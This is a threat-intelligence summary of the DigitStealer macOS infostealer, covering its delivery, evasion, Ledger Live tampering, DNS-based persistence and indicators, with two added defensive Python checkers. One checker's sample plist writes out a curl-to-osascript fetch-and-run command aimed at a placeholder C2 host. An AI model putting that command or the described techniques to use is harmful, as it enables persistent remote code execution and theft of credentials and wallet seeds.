DigitStealer MacOS Infostealer

DigitStealer is a macOS information stealer delivered as an unsigned DynamicLake.dmg that runs almost entirely in memory and abuses JavaScript for Automation (JXA) and AppleScript to harvest high-value data. It enforces geographic and Apple Silicon M2+ hardware checks, fetches four in-memory payloads (AppleScript stealer, two obfuscated JXA modules, and a LaunchAgent backdoor using DNS TXT for C2), and tampers with Ledger Live to enable seed-phrase exfiltration. #DigitStealer #LedgerLive

Keypoints

  • Distributed as an unsigned disk image named DynamicLake.dmg that tricks users into executing a curl-piped bash dropper via a “drag-to-Terminal” Gatekeeper bypass.
  • The first-stage bash dropper performs geographic filtering (blocks former Soviet states and associated countries) and extensive anti-analysis checks to exclude VMs, Intel Macs, and M1 systems.
  • Hardware-specific checks verify Apple Silicon M2+ features, and the malware refuses to run if expected ARM capabilities are missing.
  • Four separate in-memory payloads are fetched from Cloudflare Pages: an AppleScript infostealer, two obfuscated JXA modules (general stealer and Ledger Live modifier), and a LaunchAgent persistence script.
  • The Ledger Live attack downloads three segmented pieces, concatenates them in memory, and swaps a trojanized app.asar into the legitimate bundle to facilitate seed-phrase exfiltration.
  • Persistence is achieved via a LaunchAgent that queries a DNS TXT record for the current backdoor URL and repeatedly downloads and runs obfuscated JXA code, sending an MD5-hashed hardware UUID with each request.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – Delivered as an unsigned DMG and executed by tricking the user into dragging a disguised file into Terminal to run a curl-piped bash one-liner (‘…victim drags a disguised .msi text file into Terminal, triggering a one-liner that uses curl to pull and pipe an obfuscated bash dropper directly into memory.’).
  • [T1059] Command and Scripting Interpreter – Uses bash, AppleScript, and JavaScript for Automation (JXA) to execute in-memory payloads for data theft and application tampering (‘…leverages JavaScript for Automation (JXA) and AppleScript…’ and ‘the dropper uses nohup curl to fetch four additional payloads… and executes them directly in memory’).
  • [T1036] Masquerading – Impersonates a legitimate utility by distributing an unsigned DynamicLake.dmg to evade user suspicion (‘…distributed as an unsigned disk image named DynamicLake.dmg, the sample impersonates the legitimate DynamicLake utility’).
  • [T1497] Virtualization/Sandbox Evasion – Implements extensive anti-analysis checks to detect VMs, Intel/M1 hardware, and geographic locations, exiting if checks fail (‘…blocks execution on virtual machines, Intel-based Macs, M1 chips, and systems in specific geographic locales’ and ‘introduces checks specific to Apple Silicon hardware features introduced with the M2 series…’).
  • [T1547] Boot or Logon Autostart Execution – Installs a LaunchAgent plist that fetches and executes updated JXA backdoor code to maintain persistence (‘…drops a LaunchAgent plist…the agent queries a DNS TXT record on the C2 to retrieve the current backdoor URL, then continuously downloads and executes fresh obfuscated JXA every ten seconds’).
  • [T1071.004] Application Layer Protocol: DNS – Uses DNS TXT records to deliver the current backdoor URL to the LaunchAgent for C2 coordination (‘…the agent queries a DNS TXT record on the C2 to retrieve the current backdoor URL…’).
  • [T1041] Exfiltration Over C2 Channel – Exfiltrates harvested files, Notes data, and other targeted information to the attacker-controlled C2 (‘…harvests Desktop, Documents, and Downloads files and Notes data, then exfiltrates everything to the C2.’).
  • [T1555] Credentials from Password Stores – Targets the Keychain, browser profiles, cryptocurrency wallets, and Ledger Live to steal credentials and seed phrases (‘…targeting browser profiles, cryptocurrency wallets, the Keychain database, VPN configs, and Telegram tdata’ and Ledger Live modifications to enable seed-phrase exfiltration).
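The T1547 and T1071.004 entries describe a LaunchAgent that resolves a DNS TXT record for its backdoor URL, fetches obfuscated JXA with curl, runs it through osascript on a ten-second interval, and tags each request with an MD5 of the hardware UUID. The following triage script is an added example written for this summary; it is not code from the PolySwarm report or from the malware. It parses LaunchAgent plists with the standard library and scores the flattened command line against patterns for exactly those behaviours. The pattern list, the weights, the score threshold and both sample plists (which use a placeholder .invalid domain, not a real indicator) are this example's own assumptions.

```python
# Added example, not from the PolySwarm write-up: score LaunchAgent plists for the
# DNS-TXT-resolved, curl-fetched, osascript-executed JXA pattern the report describes.
# Pattern names, weights and threshold are assumptions chosen for this illustration.
import plistlib
import re
from pathlib import Path

# (name, regex, weight) applied to the agent's flattened command line.
SUSPICIOUS_PATTERNS = [
    ("dns_txt_lookup", re.compile(r"\b(dig|nslookup|host)\b.*\bTXT\b", re.I), 3),
    ("curl_fetch", re.compile(r"\bcurl\b", re.I), 1),
    ("jxa_exec", re.compile(r"osascript\s+-l\s+JavaScript", re.I), 3),
    ("pipe_to_interpreter", re.compile(r"\|\s*(bash|sh|zsh|osascript)\b", re.I), 2),
    ("hardware_uuid", re.compile(r"IOPlatformUUID", re.I), 2),
    ("md5_hash", re.compile(r"\bmd5\b", re.I), 1),
]
SUSPICIOUS_THRESHOLD = 6  # assumption: tune against your own LaunchAgent baseline


def command_line(plist: dict) -> str:
    """Flatten Program and ProgramArguments into one string for matching."""
    parts = [str(plist["Program"])] if "Program" in plist else []
    parts.extend(str(a) for a in plist.get("ProgramArguments", []))
    return " ".join(parts)


def triage_plist(data: bytes) -> dict:
    """Return label, matched pattern names, score and a suspicious verdict."""
    plist = plistlib.loads(data)
    cmd = command_line(plist)
    hits = [name for name, rx, _ in SUSPICIOUS_PATTERNS if rx.search(cmd)]
    score = sum(w for name, _, w in SUSPICIOUS_PATTERNS if name in hits)
    interval = plist.get("StartInterval")
    if isinstance(interval, int) and interval <= 60:  # report: every ten seconds
        hits.append("short_start_interval")
        score += 2
    if plist.get("RunAtLoad"):
        hits.append("run_at_load")
        score += 1
    return {"label": plist.get("Label"), "score": score, "hits": hits,
            "suspicious": score >= SUSPICIOUS_THRESHOLD}


def scan_launch_agents(directory: Path) -> list:
    """Triage every *.plist in a LaunchAgents directory; parse errors are reported, not fatal."""
    results = []
    for path in sorted(directory.glob("*.plist")):
        try:
            r = triage_plist(path.read_bytes())
        except Exception as exc:  # malformed plist is itself worth a look
            r = {"label": path.name, "score": 0, "hits": [f"parse_error:{exc}"], "suspicious": False}
        r["path"] = str(path)
        results.append(r)
    return results


# Constructed sample resembling the described agent; c2.example.invalid is a placeholder.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string><string>-c</string>
    <string>U=$(dig +short TXT c2.example.invalid | tr -d '"'); ID=$(ioreg -rd1 -c IOPlatformExpertDevice | grep IOPlatformUUID | md5); curl -s "$U?id=$ID" | osascript -l JavaScript</string>
  </array>
  <key>StartInterval</key><integer>10</integer>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

# Constructed benign agent for comparison.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array><string>/usr/bin/rsync</string><string>-a</string><string>/Users/me/Documents</string><string>/Volumes/Backup/</string></array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>"""

if __name__ == "__main__":
    for blob in (SAMPLE_PLIST, BENIGN_PLIST):
        print(triage_plist(blob))
    print(scan_launch_agents(Path.home() / "Library" / "LaunchAgents"))
```

On a live host, point scan_launch_agents at ~/Library/LaunchAgents (and /Library/LaunchAgents for system-wide entries); a plist whose only hit is a short StartInterval will not cross the threshold, so the verdict rests on the combination of DNS TXT lookup, JXA execution and piping to an interpreter rather than on any single pattern.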

Indicators of Compromise

  • [File Hash] DigitStealer sample hashes – 226cbbf43d9bcedcc5ab69e51e5cce2f4ca841aa7ab39fdf974766203e2c9b66, 5420a25fdd6cb6484ab3687c6bba750b40007730eb4232088b668eff0de2c072, and 3 more hashes.
  • [File Name] Distribution artifact and dropper trigger – DynamicLake.dmg, disguised .msi text file used for drag-to-Terminal execution.
  • [File Path] Ledger Live tampering target – ~/Library/Application Support/Ledger Live/app.json (modified to point to attacker-controlled endpoints) and trojanized app.asar segments concatenated in memory.
  • [Persistence] LaunchAgent and DNS-based C2 retrieval – LaunchAgent plist that queries DNS TXT records on the attacker C2 to retrieve backdoor URLs and fetch JXA payloads.
  • [Infrastructure] Hosting and delivery – Payloads fetched from Cloudflare Pages infrastructure (used as hosting for the four in-memory payloads) and DNS TXT records for C2 coordination.
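The File Path indicator gives the two Ledger Live artifacts to verify after a suspected infection: app.json rewritten to point at attacker-controlled endpoints, and a trojanized app.asar swapped into the bundle. The script below is an added example written for this summary, not code from the PolySwarm report; it walks app.json as generic JSON (the real schema is not assumed), lists every URL host that is not under an allowed domain suffix, and compares the SHA-256 of app.asar against a baseline recorded from a known-good install. The allowed suffix ledger.com, the Electron-style app.asar location under Contents/Resources, the placeholder baseline hash and the sample config are all assumptions of this example.

```python
# Added example, not from the PolySwarm write-up: check a Ledger Live install for the
# two tampering artifacts the report names (app.json endpoints, replaced app.asar).
# Allowed domains, file locations and the baseline hash are this example's assumptions.
import hashlib
import json
import re
from pathlib import Path
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)


def iter_strings(obj):
    """Yield every string value inside an arbitrary JSON structure."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from iter_strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from iter_strings(v)


def unexpected_hosts(config_text: str, allowed_suffixes) -> list:
    """Hosts of URLs in the config that are not an allowed domain or a subdomain of one."""
    data = json.loads(config_text)
    bad = set()
    for s in iter_strings(data):
        for url in URL_RE.findall(s):
            host = (urlparse(url).hostname or "").lower()
            if not any(host == suf or host.endswith("." + suf) for suf in allowed_suffixes):
                bad.add(host)
    return sorted(bad)


def sha256_file(path: Path) -> str:
    """Streaming SHA-256 so a large app.asar is not read into memory at once."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def check_ledger_live(app_json, app_asar, baseline_asar_sha256: str,
                      allowed_suffixes=("ledger.com",)) -> dict:
    """Return findings for the config endpoints and the asar hash; missing files are not flagged."""
    app_json, app_asar = Path(app_json), Path(app_asar)
    hosts = unexpected_hosts(app_json.read_text(), allowed_suffixes) if app_json.exists() else []
    asar_modified = app_asar.exists() and sha256_file(app_asar) != baseline_asar_sha256.lower()
    return {"unexpected_hosts": hosts, "asar_modified": asar_modified,
            "tampered": bool(hosts) or asar_modified}


# Constructed sample config; the shape is invented and collect.example.invalid is a placeholder.
SAMPLE_CONFIG = json.dumps({
    "updates": {"feedURL": "https://example.ledger.com/updates"},
    "api": ["https://api.ledger.com/v1", "https://collect.example.invalid/seed"],
})

if __name__ == "__main__":
    print(unexpected_hosts(SAMPLE_CONFIG, ("ledger.com",)))
    # Paths from the report (app.json) and the usual Electron layout (app.asar, assumed).
    home = Path.home()
    print(check_ledger_live(
        home / "Library" / "Application Support" / "Ledger Live" / "app.json",
        Path("/Applications/Ledger Live.app/Contents/Resources/app.asar"),
        baseline_asar_sha256="<sha256 recorded from a known-good install>",
    ))
```

Record the baseline hash from a freshly downloaded, signature-verified Ledger Live build rather than from the suspect machine, and treat any host outside the allowlist as a finding to investigate rather than proof on its own, since the real config may legitimately reference third-party services you then add to the allowlist.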


Read more: https://blog.polyswarm.io/digitstealer-macos-infostealer